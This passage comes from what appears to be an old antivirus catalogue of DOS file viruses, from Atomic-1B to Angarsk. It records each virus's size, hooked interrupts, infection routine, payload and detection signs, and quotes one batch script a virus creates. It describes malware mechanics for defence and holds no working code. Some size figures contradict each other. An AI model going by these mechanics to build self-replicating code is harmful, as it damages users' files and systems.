2) When the system date is the 26th, the following message will be displayed before the system hangs: "The Atomic Dustbin 1B -- This is almost the second step !" 3) When the system date is neither the 1st nor the 26th: i) the virus proceeds to search all COM files in the current directory; ii) checks whether the file is infected. If yes, continues to search; iii) if an uninfected file is found, proceeds to infect it. (only infects two files at a time). After infecting, displays "Program execution terminated." Damage: None Detection method: Detectable if the string "Program execution terminated" is displayed when a program is executed. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Atomic-1A] Virus Name: Atomic-1A Virus Type: Parasitic Virus Virus Length: The lengths of the infected COM files do not increase (Does not infect EXE files.) PC Vectors Hooked: None Execution Procedure: 1) When the system date is the 25th, the virus displays the string "The Atomic Dustbin 1A -- This is almost the first step !" and hangs the system. 2) When the system date is not the 25th: i) it searches for a COM file in the current directory; ii) checks whether the file is infected. If yes, continues to search; iii) if an uninfected file is found, the virus will proceed to infect it (only infects two files at a time). After infecting, displays the string "Bad command or file name". Damage: None Detection method: Detectable if the string "bad command or file name" is displayed when a file is executed. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Arusiek] Virus Name: Arusiek Virus Type: Parasitic Virus Virus Length: Infected EXE and COM file sizes increase by 817 bytes. PC Vectors Hooked: INT 21h and INT 24h Execution Procedure: 1) Checks whether it already resides in the memory. If not, it hooks INT 21h and implants itself in memory, and then executes the host program. 2) If it already resides in memory, the host program will be executed directly. Infection Procedure: 1) Infects files by AH=4B in INT 21h. Uninfected files will be infected when they are executed. 2) Before infecting files, the virus will hook INT 24h in order to ignore I/O errors. Damage: None Detection method: Detectable if the lengths of files increase by 817 bytes. [Atas-3] Virus Name: Atas-3 Virus Type: Parasitic Virus Virus Length: Infected EXE and COM file sizes increase by 1268 bytes. PC Vectors Hooked: INT 21h and INT 24h Execution Procedure: 1) Checks whether it resides in the memory. If not, hooks INT 21h and implants itself in the memory, and then executes the host program. 2) If it already resides in the memory, the host program will be executed directly. Infection Procedure: 1) Infects files by AH=4B in INT 21h. Uninfected files will be infected when they are executed. 2) Before infecting files, the virus will hook INT 24h in order to ignore I/O errors. Damage: None Detection method: Detectable if the lengths of files increase by 1268 bytes. [ARCV-570] Virus Name: Arcv-570 Virus Type: Parasitic Virus Virus Length: Infected EXE file sizes increase by 570-585 Bytes (Does not infect COM files.) PC Vectors Hooked: None Execution Procedure: 1) Searches for an EXE file in the current directory. 2) Checks whether the file is infected. If yes, continues to search until an uninfected file is found and then infects it (only infects one file at a time). Damage: None Detection method: Detectable if the lengths of files increase by 570-585 Bytes. Remarks: 1) Non memory resident. 2) When infecting files, it does not hook INT 24h. Error message will appear when I/O errors occur. [Atas-3215] Virus Name: Atas-3215 Virus Type: Parasitic Virus. Virus Length: About 3215 bytes (there are several variations.) PC Vectors Hooked: INT 21h Execution Procedure: (The virus only infects files in DOS 3.3) 1) Checks whether it resides in the memory. If not, hooks INT 21h and implants itself in the memory, and proceeds to execute the original program. 2) If it already resides in the memory, the host program will be executed directly. Infection Procedure: 1) Infects files by AH=4B in INT 21h. Uninfected files will be infected when they are executed. [Andromda] Virus Name: Andromda Virus Type: Parasitic Virus Virus Length: Infected COM files increase by 1140 Bytes (Does not infect EXE files). PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks whether the file is infected. If yes, continues to search until an uninfected file is found. 3) Then infects it (only infects two files at a time.) Damage: None Detection method: Detectable if the lengths of files increase by 1140 Bytes. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Grunt-529] Virus Name: Grunt-529 Virus Type: Parasitic Virus Virus Length: Infected COM files increase by 529 Bytes (Does not infect EXE files). PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks whether the file is infected. If yes, continues to search. 3) If an uninfected file is found, infects it. (only infects one file at a time.) 4) Checks the system date no matter an uninfected COM file is found or not. If the date is Friday and it is after the year 1993, the virus displays the following information on the screen: "Nothing like the smell of napalm in the morning!" Damage: None Detection method: Detectable if the lengths of files increase by 529 Bytes. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Ein-Volk] Virus Name: Ein-Volk Virus Type: Parasitic Virus Virus Length: Infected COM files increase by 482 Bytes (Does not infect EXE files.) PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks whether the file is infected. If yes, continues to search. 3) If an uninfected file is found, proceeds to infect it. Does not stop searching until all the COM files in the directory are infected. Damage: None Detection method: Detectable if the lengths of files increase by 482 Bytes. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [DOS7] Virus Name: Dos7 Virus Type: Parasitic Virus Virus Length: Infected COM files increase by 342 Bytes (Does not infect EXE files). PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks whether the file is infected. If yes, it continues to search. 3) If an uninfected file is found, the virus proceeds to infect it (only infects one file at a time). Damage: None Detection method: Detectable if the lengths of files increase by 342 Bytes. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Dooms-715] Virus Name: Dooms-715 Virus Type: Parasitic Virus Virus Length: Infected COM files increase by 715 Bytes (Does not infect EXE files). PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the root directory. 2) Checks whether the file is infected. If yes, continues to search. 3) If an uninfected file is found, infects it (only infects one file at a time). Damage: None Detection method: Detectable if the lengths of files increase by 715 Bytes. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Dir-522] Virus Name: Dir-522 Virus Type: Parasitic Virus Virus Length: Infected COM files increase by 1268 bytes (Does not infect EXE files). PC Vectors Hooked: INT 21h and INT 24h Execution Procedure: 1) Checks whether it resides in memory. If not, hooks INT 21h and implants itself in memory, and then executes the host program. 2) If it already resides in memory, the host program will be executed directly. Infection Procedure: 1) The virus infects files by "dir" command. When "dir" command is executed, the virus searches for an uninfected file and then infects it. 2) Before infecting files, the virus hooks INT 24h in order to ignore I/O errors. Damage: None Detection method: Detectable if the lengths of files increase by 522 bytes. [Compan-83] Virus Name: Compan-83 Virus Type: Parasitic Virus Virus Length: 83 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it resides in memory. If not, hooks INT 21h and implants itself in memory, and then executes the host program. 2) If it already resides in memory, the program will be executed directly. Infection Procedure: 1) The virus infects files by AH=4B in INT 21h. When an infected EXE file is executed, the virus will create a COM file with a length of 83 bytes. The content of the COM file is the virus itself (hidden file). 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. Damage: None Detection method: Detectable if the file increases by 83 bytes. [ChipShit] Virus Name: Chipshit Virus Type: Parasitic Virus Virus Length: Infected COM files increase by 877 bytes (Does not infect EXE files). PC Vectors Hooked: None Execution Procedure: 1) Checks the system date. If the date is later than Feb. 11, 1993, the virus displays the following information on the screen: "Hej! Tu wirus chipshit! Co........" 2) If the date is before Feb. 11, 1993: a) Searches for a COM file in the current directory. b) Checks whether the file is infected. If yes, it continues to search. c) If an uninfected file is found, it proceeds to infect it (only infects one file at a time). Damage: None Detection method: Detectable if the lengths of files increase by 877 bytes. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Carbuncl] Virus Name: Carbuncl Virus Type: Parasitic Virus Virus Length: 622 bytes PC Vectors Hooked: None Execution Procedure: 1) With a 5/6 chance probability: i) Searches for an EXE file in the current directory. ii) Renames the file as *.crp, and then creates a *.bat file with the following commands: @ECHO OFF CARBUNCL RENAME JEXE.CRP JEXE.EXE JEXE.EXE RENAME JEXE.EXE JEXE.CRP CARBBUNCL (JEXE.EXE is the infected file, and CARBUNCL is the virus) iii) Repeats the above procedure until all EXE files are infected. 2) With a 1/6 chance probability: Infects five *.CRP files. Damage: None Detection method: Detectable if the lengths of files increase by 877 bytes. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [VCL-2] Virus Name: Vcl-2 Virus Type: Parasitic Virus Virus Length: Infected COM files increase by 663 bytes (Does not infect EXE files). PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks if the file is infected. If yes, continues to search. 3) If an uninfected file is found, it proceeds to infect it (only infects two files at a time). Damage: None Detection method: Infected files increase by 663 bytes Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Necro] Virus Name: Necro Virus Type: Parasitic Virus Virus Length: Infected COM and EXE files increase by 696 bytes. PC Vectors Hooked: None Execution Procedure: 1) Searches for an uninfected COM/EXE file. 2) Checks if the file has been infected. If yes, continues to search. 3) If an uninfected file is found, infects it (infects three files at a time). Damage: None Detection method: Detectable if the files increase by 696 bytes Remarks: 1) The infection part was badly written, so most of the infected files can not execute (not able to infect and damage). 2) Non memory resident. 3) Before infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Eagl-7705] Virus Name: Eagl-7705 Virus Type: Parasitic Virus Virus Length: 7705 bytes Execution Procedure: 1) Searches for an EXE file in the current directory. 2) Then creates a COM file with a length of 7705 bytes. The contents of the COM file is the virus itself (hidden file). 3) Repeats the procedure until all EXE files in the current directory are infected. Damage: None Detection method: Detectable if the lengths of files increase by 7705 bytes. Remarks: Non memory resident. [Eno-2430] Virus Name: Eno-2430 Virus Type: Parasitic Virus Virus Length: Infected COM and EXE files increase by 2430-2445 bytes. PC Vectors Hooked: INT 21h and INT 24h Execution Procedure: 1) Checks if it resides in memory. If not, hooks INT 21h, installs itself as memory resident and then executes the host program. 2) If it already resides in memory, executes the host program directly. Infection Procedure: 1) The virus infects files by AH=4B in INT 21h. When an uninfected program is executed, it becomes infected. 2) Before infecting files, Eno-2430 will hook INT 24h first to ignore I/O errors. Damage: The virus has a counter; after infecting a file, it subtracts 1 from the counter. When the counter=0, the virus will destroy all data on the hard disk. Detection method: Detectable if the files increase by 2430-2445 bytes. [Exper-755] Virus Name: Exper-755 Virus Type: Parasitic Virus Virus Length: Infected EXE files increase by 755 bytes (Does not infect COM files). PC Vectors Hooked: INT 24h Execution Procedure: 1) Searches for an EXE file in the current directory. 2) Checks if the file is infected. If yes, continues to search. 3) If an uninfected file is found, proceeds to infect it. Does not stop searching until all the COM files in the directory are infected. Damage: None Detection method: Detectable if the files increase by 755 bytes. Remarks: 1) Non memory resident. 2) Before infecting, the virus hooks INT 24h first to ignore I/O errors. [Findm-695] Virus Name: Findm-695 Virus Type: Parasitic Virus Virus Length: Infected COM files increase by 695-710 bytes (Does not infect EXE files). PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks if the file is infected. If yes, continues to search. 3) If an uninfected file is found, proceeds to infect it. Damage: None Detection method: Detectable if the files increase by 695-710 bytes. Remarks: 1) The infection part of the virus was badly written. Most of the infected files can not be executed normally (The virus is not able to infect and damage). 2) Non memory resident. 3) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [FR-1013] Virus Name: FR-1013 Virus Type: Parasitic Virus Virus Length: Infected EXE and COM files increase by 1013-1028 bytes. PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks if it resides in the memory. If not, hooks INT 21h, installs itself as memory resident and then executes the host program. 2) If it already resides in the memory, proceeds to execute the host program directly. Infection Procedure: 1) The virus infects files by AH=4B in INT 21h. When an uninfected program is executed, it becomes infected. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. Damage: None Detection method: Detectable if the files increase by 1013-1028 bytes. [Harm-1082] Virus Name: Harm-1082 Virus Type: Parasitic Virus Virus Length: Infected COM files increase by 1082-1097 bytes (Does not infect EXE files). PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks if it resides in the memory. If not, it hooks INT 21h, installs itself as memory resident and then executes the host program. 2) If it already resides in the memory, it proceeds to execute the host program directly. Infection Procedure: The virus infects files by AH=4B in INT 21h. When an uninfected program is executed, it becomes infected. Damage: None Detection method: Detectable if the files increase by 1082-1097 bytes. [Hor-2248] Virus Name: Hor-2248 Virus Type: Parasitic Virus Virus Length: Infected EXE and COM files increase by 2248 bytes. PC Vectors Hooked: INT 21h and INT 24h Execution Procedure: (The virus cannot run in DOS 5.0) 1) Checks if it resides in the memory. If not, it hooks INT 21h, installs itself as memory resident and then executes the host program. 2) If it already resides in the memory, it proceeds to execute the host program directly. Infection Procedure: 1) The virus infects files by AH=4B in INT 21h. When an uninfected program is executed, it becomes infected. 2) Before infecting, the virus hooks INT 24h first to ignore I/O errors. Damage: None Detection method: Detectable if the files increase by 2248 bytes. [Encroach2] Virus Name: Encroach2 Virus Type: Parasitic Virus PC Vectors Hooked: INT 24h Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks if the file is infected. If yes, it continues to search. 3) If an uninfected file is found, proceeds to infect it (infects one file at a time). Damage: None Remarks: 1) Non memory resident. 2) Before infecting, the virus hooks INT 24h to ignore I/O errors. [Encroach] Virus Name: Encroach Virus Type: Parasitic Virus PC Vectors Hooked: INT 24h Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks if the file is infected. If yes, it continues to search. 3) If an uninfected file is found, proceeds to infect it (infects one file at a time). Damage: None Remarks: 1) Non memory resident. 2) Before infecting, the virus hooks INT 24h to ignore I/O errors. [DWI] Virus Name: Dwi Virus Type: Parasitic Virus Virus Length: Infected EXE files increase by 1050-1070 bytes (Does not infect COM files). PC Vectors Hooked: INT 21h and INT 24h Execution Procedure: 1) Checks if it resides in the memory. If not, it hooks INT 21h, installs itself as memory resident and proceeds to execute the host program. 2) If it already resides in the memory, it proceeds to execute the host program directly. Infection Procedure: 1) The virus infects files by AH=4B in INT 21h. When an uninfected program is executed, it becomes infected. 2) Before infecting, the virus hooks INT 24h to ignore I/O errors. Damage: None Detection method: Detectable if the files increase by 1050-1070 bytes. [Dennis] Virus Name: Dennis (has at least two variations) Virus Type: Parasitic Virus PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks if it resides in the memory. If not, it hooks INT 21h, installs itself as memory resident and then executes the host program. 2) If it already resides in the memory, it proceeds to execute the host program directly. Infection Procedure: 1) The virus infects files by AH=4B in INT 21h. When an uninfected program is executed, it becomes infected. 2) When infecting files, Dennis does not hook INT 24h. Error message will appear when I/O errors occur. Damage: None [Comsysexe] Virus Name: Comsysexe (There are several variations) Virus Type: Parasitic Virus PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks if it resides in the memory. If not, it hooks INT 21h, installs itself as memory resident and then executes the host program. 2) If it already resides in the memory, it proceeds to execute the host program directly. Infection Procedure: 1) The virus infects files by AH=4B in INT 21h. When an uninfected program is executed, it becomes infected. (infects EXE, COM and SYS files) 2) When infecting files, Comsysexe does not hook INT 24h. Error message will appear when I/O errors occur. Damage: None [Cruncher] Virus Name: Cruncher Virus Type: Parasitic Virus PC Vectors Hooked: INT 21h and INT 24h Execution Procedure: 1) Check if it resides in memory. If not, it hooks INT 21h, installs itself as memory resident and then executes the host program. 2) If it already resides in memory, it proceeds to execute the host program directly. Infection Procedure: 1) The virus infects files by AH=4B in INT 21h. When an uninfected program is executed, it becomes infected. 2) Before infecting files, the virus hooks INT 24h to ignore I/O errors. Damage: None [Ice-159] Virus Name: Ice-159 Virus Type: Parasitic Virus Virus Length: Infected COM files increase by 159 bytes (Does not infect EXE files). PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks if the file is infected. If yes, it continues to search. 3) If an uninfected file is found, it proceeds to infect it (infects one file at a time). Damage: None Detection method: Detectable if the files increase by 159 bytes. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error messages will appear when I/O errors occur. [Joker3] Virus Name: Joker3 Virus Type: Parasitic Virus Virus Length: Infected COM files increase by 1084 bytes (Does not infect EXE files). PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks if it resides in the memory. If not, it hooks INT 21h, installs itself as memory resident and then executes the host program. 2) If it already resides in the memory, it proceeds to execute the host program directly. Infection Procedure: The virus infects files by INT 21h. When INT 21h is executed, all the COM files in the current directory will be infected. When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. Damage: None Detection method: Detectable if the files increase by 1084 bytes. [Mi-Nazi] Virus Name: Mi-Nazi Virus Type: Parasitic Virus Virus Length: Infected COM files increase by 1084 bytes (Does not infect EXE files). PC Vectors Hooked: INT 21h Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks if the file is infected. If yes, it continues to search. 3) If an uninfected file is found, it proceeds to infect it (only infects one file at a time). Damage: The part for virus infection was badly written. The infected files cannot be executed normally (Furthermore, the virus is not able to infect and damage). Remarks: 1) The virus infects files by INT 21h. When INT 21h is executed, all COM files in the current directory will be infected. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Tiny-143] Virus Name: Tiny-143 Virus Type: Memory Resident (OS), File Virus Virus Length: Infected COM files increase by 143 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks if the file is infected. If yes, it continues to search. 3) If an uninfected file is found, it proceeds to infect it (only infects one file at a time). Damage: None Detection method: 1) Date and time fields of infected files are changed. 2) Infected files increase by 143 bytes. [Smal-122B] Virus Name: Smal-122B Virus Type: Memory Resident(OS), File Virus Virus Length: Infected COM and EXE files increase by 122 bytes. PC Vectors Hooked: INT 21h Execution Procedure: Checks whether it resides in the memory. If not, the virus copies itself to absolute address 0000:0103h. Then hooks INT21h and goes back to the original routine. If the program to be executed is an uninfected COM or EXE file and its first byte is not E9h, the virus proceeds to infect it. Damage: EXE files are destroyed because of the subsequent head damage. Note: Some interrupts cannot run correctly because the virus has stayed resident in the vector area. Detection method: 1) Date and time fields of infected files are changed. 2) Infected files increase by 122 bytes. [Printmon] Virus Name: Printmon Virus Type: File Virus Virus Length: Infected COM files increase by 853 bytes. PC Vectors Hooked: INT 17h (printing function) to change print data. Execution Procedure: Checks whether it has hooked INT 17h. If not, virus makes some procedure of INT 17h to stay resident in the memory. Then proceeds to infect all uninfected COM files with length less than 64000 bytes on te current directory and goes back to the original routine (During the infection period, it hangs INT 24h to prevent divulging its trace when writing). Damage: The virus will cause some errors in the printed out data. Note: Date and time fields of infected files are not change. Detection method: Infected files will increase by 853 bytes. [Tiny-124] Virus Name: Tiny-124 Virus Type: Memory Resident(OS), File Virus Virus Length: Infected COM files increase by 124 bytes. PC Vectors Hooked: INT 21h Execution Procedure: Checks whether it resides in the memory. If not, the virus copies itself to absolute address 0050:0103h. Then hooks INT21h and goes back to the original routine. Infection Procedure: If the program to be executed is an uninfected COM file and its first byte is not E9h, the virus proceeds to infect it. Damage: COM files are destroyed because of the subsequent head damage. Note: Some interrupts cannot run correctly because the virus has stayed resident in the vector area. Detection method: 1) Date and time fields of infected files are changed. 2) Infected files increase by 124 bytes. [Smal-124] Virus Name: Smal-124 Virus Type: Memory Resident(OS), File Virus Virus Length: Infected COM files increase by 124 bytes PC Vectors Hooked: INT 21h Execution Procedure: Checks whether it is residing in the memory. If not, it copies itself to absolute address 0050:0103h. Then hooks INT21h and goes back to the original routine. Infection Procedure: If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Note: Some interrupts cannot run correctly because the virus has stayed resident in the vector area. Detection method: 1) Date and time fields of infected files are changed. 2) Infected files increase by 124 bytes. [Troi2] Virus Name: Troi2 Virus Type: Memory Resident(OS), File Virus Virus Length: Infected EXE files increase by 512 bytes. PC Vectors Hooked: INT 21h Execution Procedure: Checks whether the current date is before 5/1/1992. If it is, it returns to the original routine directly. Otherwise, checks whether it is residing in the memory. If not, the virus copies itself to absolute address 0000:0200h (The area for interrupts vectors), hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21h to check whether it is residing in the memory. 2) Hooks INT 21H (AH=4Bh) to infect files. If the program to be executed is an uninfected EXE file, the virus proceeds to infect it. Damage: None Note: Date and time fields of infected files are not change. Detection method: Infected files increase by 512 bytes. [Tver] Virus Name: Tver Virus Type: Memory Resident(OS), File Virus Virus Length: Infected COM files increase by 308 bytes. PC Vectors Hooked: INT 21h Execution Procedure: Checks whether it is residing in the memory. If not, the virus copies itself to absolute address 0000:0200h (the area for interrupt vectors), hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21h to check whether it is residing in the memory. 2) Hooks INT 21H (AH=4Bh) to infect files. If the program to be executed is an uninfected COM file and its first byte is E9h, the virus proceeds to infect it. Damage: None Note: Many virus files' first byte is E9h. In most cases, the virus corrects the files' first byte if it is not E9h. Detection method: 1) Date and time fields of infected files are changed. 2) Infected files increase by 308 bytes. [Wave] Virus Name: Wave Virus Type: Memory Resident(OS), File Virus Virus Length: Infected COM files increase by 454 bytes. PC Vectors Hooked: INT 21h, 1Ch Execution Procedure: Checks whether it is residing in the memory. If not, the virus copies itself to absolute address 0000:01ECh (the area for interrupt vectors), hooks INT 21h and INT 1Ch, changes the pointer of INT 78h to the address pointed by the original INT 21h. Then goes back to the original routine. Infection Procedure: INT 21h: 1) Hooks INT 21h to check whether it remains in the memory. 2) Hooks INT 21h (AH=4Bh,AH=3Dh) to infect files. If the program to be executed is an uninfected COM, and the combined length of the program and the virus is between 1500 and 64000 bytes and it is on C drive (except A and B drive), then the virus will proceed to infect. Otherwise, it will set a flag to be used by INT 1Ch at a later time. INT 1Ch: Hooks INT 1Ch to shake the screen from side to side for 33 seconds after the flag is set by INT 21h. Damage: None Note: Time and date (except year) of infected files are not changed. You cannot see the change when you use the "Dir" command because the last two bytes of the data are not changed (You would see some problems on arrangement order if you attach "/od" to the "Dir" command). Detection method: Infected files increase by 454 bytes. [Zz1] Virus Name: Zz1 Virus Type: Overwrite, File Virus (COM files) Virus Length: 127 bytes Execution Procedure: Searches for an uninfected COM file on the current directory and infects it (only infects one file at a time). If there is no file to infect, it changes data in the system RAM to set the screen lines to 81. This confuses the screen. Damage: 1) It overwrites the first 127 bytes of the original files with the virus code. Original files are destroyed. 2) Confuses the screen if there are no infectable files. Note: Date and time fields of infected files are not changed. [Willow] Virus Name: Willow Virus Type: Memory Resident, File Virus (EXE files) Virus Length: 1870 bytes PC Vectors Hooked: INT 21h Execution Procedure: Checks whether it has remained in the memory. If not, hooks INT 14h first, then changes the pointer of INT FDh to the address that is pointed by INT 21h. Then hooks INT 21h. Lastly, after all memory is released, gets the name of the Shell executed by the system from the environment parameter. Executes this Shell again. Terminates upon reloading itself memory resident. Infection Procedure: 1) Hooks INT 21h to check whether it has stayed resident in memory. 2) Hooks INT 21h(AH=4Bh) to infect files. If the program to be executed is a COM file, the virus deletes it. If it is an EXE file, the virus proceeds to infect it. Damage: It deletes COM files executed while the virus is memory resident. Note: Date and time fields of infected files are not changed. Detection method: Infected files increase by 1870-1885 bytes. [V-66] Virus Name: V-66 Virus Type: Overwrites, File Virus (all files) Virus Length: 66 bytes Execution Procedure: Infects all files in the current directory. Infection Procedure: Changes the files' attributes, making them writable. Proceeds to overwrite the first 66 bytes with the virus code. Damage: It overwrites the original files with the virus code. Original files are destroyed (corrupted). Detection method: Date and time fields of infected files are changed. [VCL-408] Virus Name: VCL408 Virus Type: Overwrites, File Virus (EXE and COM files) Virus Length: 408 bytes Execution Procedure: Searches for one uninfected COM or EXE file on each directory and infects it. Virus records whether the initial infection is successful or not. Subsequent record will overwrite the original. Last record is record of last infection. The virus checks this record before terminating. If the record fails, the virus halts the system. Damage: 1) Files are corrupted after becoming infected. 2) Halts system on occasion. Note: 1) Date and time fields of infected files are not changed. 2) Length of infected files does not change unless the length of original files is less than 408. If so, the length of infected files becomes 408 bytes. [SUNDEVIL] Virus Name: SunDevil Virus Type: File Virus (COM files) Virus Length: 691 bytes PC Vectors Hooked: INT 21h Execution Procedure: Checks whether the current date is May 8. If it is, it destroys the first sector (Boot sector) on the current diskette. Then it displays the following message and repeats call INT 05h. "There is no America. There is no Democracy. There is only IBM, ITT, and AT&T. This virus is dedicated to all that have been busted for computer-hacking activities. The SunDevil Virus (C) 1993 by Crypt Keepr [SUNDEVIL] " Otherwise, the virus copies itself to absolute address 9000:0000h. Then hooks INT21h and returns to the original routine. Infection Procedure: Hooks INT 21h (AH=3D,3E,56, AX=4300,4B00,4B01) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: It destroys the boot sector of the current diskette if the current date is May 8. Note: Date and time fields of infected files are not changed. Detection method: 1) Infected files increase by 691 bytes. 2) Above message will appear when you use the "Type" command. [Skew-469] Virus Name: Skew-469 Virus Type: Memory Resident(OS), File Virus (EXE files) Virus Length: 469 bytes PC Vectors Hooked: INT 21h, INT 1Ch Execution Procedure: Checks whether it resides in the memory. If not, it copies itself to absolute address 0000:0200h, then hooks INT21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21h (AX=4B00h or AH=3Dh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. Then it checks whether the program to be executed is an uninfected EXE file. If it is, it proceeds to infect it. Finally, it restores INT 24h. 2) Hooks INT 1Ch. Increases the value of an address by 1 everytime this interrupt is called. When the value equals FFFFh, the virus writes the current value to the video card making the screen move up or down or from side to side. Damage: Causes the screen to move up to down or from side to side. Detection method: 1) Date and time fields of infected files are changed. 2) Infected files increase by 469-469+15 bytes. [Atas_400] Virus Name: Atas_400 Virus Type: File Virus (COM files) Virus Length: 400 bytes PC Vectors Hooked: INT 24h (nullifies the function for dealing with severe errors) Execution Procedure: 1) The virus decodes, hangs INT24h to prevent divulging its trace when writing, then it changes its head. 2) Searches for an uninfected COM file that is larger than 255 bytes but less than 64256 bytes. 3) Checks the system date. If the Seconds field is less than 3, it displays the following message: "I like to travel ...". Then restores INT 24h and goes back to the original routine. Damage: None Note: 1) Only infects one file at a time. 2) Date and time fields of infected files are changed. [DM-330] Virus Name: Dm-330 Virus Type: Memory Resident, File Virus (COM files) Virus Length: 330 bytes PC Vectors Hooked: INT 21h, 5Fh Execution Procedure: 1) The virus decodes, then checks whether it has stayed resident in the memory. If not, it moves itself to absolute address from 0000:0208h to 0000:0351h. 2) Hooks INT21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 5Fh. Points to the address pointed by the original INT 21h. 2) Hooks INT 21h to infect files. Virus activates when the system calls INT 21h to execute a program (AH=4Bh), changes file's attribute (AH=43h), changes file name (AH=56h), or opens a file (AH=3Dh). The virus checks whether the program to be executed is an uninfected COM file. If it is, the virus infects it. Damage: None Note: 1) The virus stays in the area for interrupt vectors. This causes a conflict in the virus routine and the interrupts vectors (address from 0000:0208h to 0000:0351h). 2) Date and time fields of infected files are not changed. [CLS] Virus Name: Cls Virus Type: Memory Resident, File Virus (COM and EXE files) Virus Length: 835 bytes PC Vectors Hooked: INT 21h, INT 08h, INT 13h Execution Procedure: 1) Checks whether it has stayed resident in the memory. If not, it moves itself to high memory. 2) Hooks INT 21h, INT 08h and INT 13h and goes back to the original routine. Infection Procedure: INT 21h: 1) Hooks INT21h to check whether it has stayed resident in the memory. 2) Hooks INT21h to infect files. Virus activates when the system calls INT21h to execute a program (AH=4Bh). It checks whether the program to be executed is an uninfected COM file and its length is between 129 bytes and 64512 bytes. If it is, the virus infects it. INT 08h: Hooks INT 08h (Time interrupt, executed once every 1/18 second). Every time this interrupt executes, a counter increments by 1. When this counter reaches 65520 (about an hour later), the virus cleans the screen (It has no effect on monochrome because the cleaning function writes 00 from B800:0000h to B800:0FA0h). INT 13h: Hooks INT 13h (virus writing assistance). Damage: The virus cleans the screen once every hour. Note: Date and time fields of infected files are not changed. Detection method: Infected files increase by 853 bytes. [Nouin] Virus Name: Nouin Virus Type: Memory Resident, File Virus (COM and EXE files) Virus Length: 855 bytes PC Vectors Hooked: INT 83h, 09h, 21h Execution Procedure: 1) Checks whether it has stayed resident in the memory. If not, it loads itself to high memory. 2) Hooks INT 21h, INT 09h and INT 83h and goes back to the original routine. (The method the virus uses to load itself to memory is fairly crude. It needs the last MCB controlled by DOS in the address when loading the executed program). Infection Procedure: 1) Hooks INT 83h to store a word for reporting whether the virus has stayed resident in the memory or not. 2) Hooks INT 09h to decrement a counter by 1 every time a key is pressed. Sets the damage_flag when the value reaches zero. 3) Hooks INT 21h (AH=3Dh,aH=43h,AX=4B00h). It checks whether the program to be executed is an uninfected EXE or COM file (it skips SCAN.EXE and CLEAN.EXE). If it is a COM file, the virus checks whether or not the file is larger than 60000. If it is, the virus infects it. Then it checks if the damage_flag is set. If it is, the virus checks if the current date is between November 11 and 30. If it is, the virus destroys sectors 1 to 9 on the current diskette. Damage: After the virus has stayed resident in the memory, and the number of times the keyboard has been struck is equal to a certain value, or the current date is between November 11 and 30, it will destroy sectors 1 to 9 on the current diskette. Note: Date and time fields of infected files are not changed. Detection method: Infected files increase by 855 bytes. [V-550] Virus Name: V-550 Virus Type: Memory Resident, File Virus (EXE files) Virus Length: 550 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) The virus checks whether it has stayed resident in the memory, and the block of memory which loads the current program is the last MCB. If it is, it moves itself to high memory. 2) Hooks INT21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21h to check whether it has stayed resident in the memory. 2) Hooks INT 21h to check whether the program to be executed is an uninfected EXE file. If it is, the virus infects it. Damage: None Detection method: 1) Date and time fields of infected files are changed. 2) Infected files increase by about 550 bytes. 3) The total memory decreases by 39 pares after the virus has stayed resident in the memory. [Angarsk] Virus Name: Angarsk Virus Type: File Virus (COM files) Virus Length: 238 bytes Execution Procedure: Searches for all uninfected COM files on the current and root directories and infects them (length of infectable files must be less than 32768 bytes). Damage: None Detection method: 1) Date and time fields of infected files are changed. 2) Infected files increase by about 238 bytes. [Enet-613] Virus Name: Enet-613 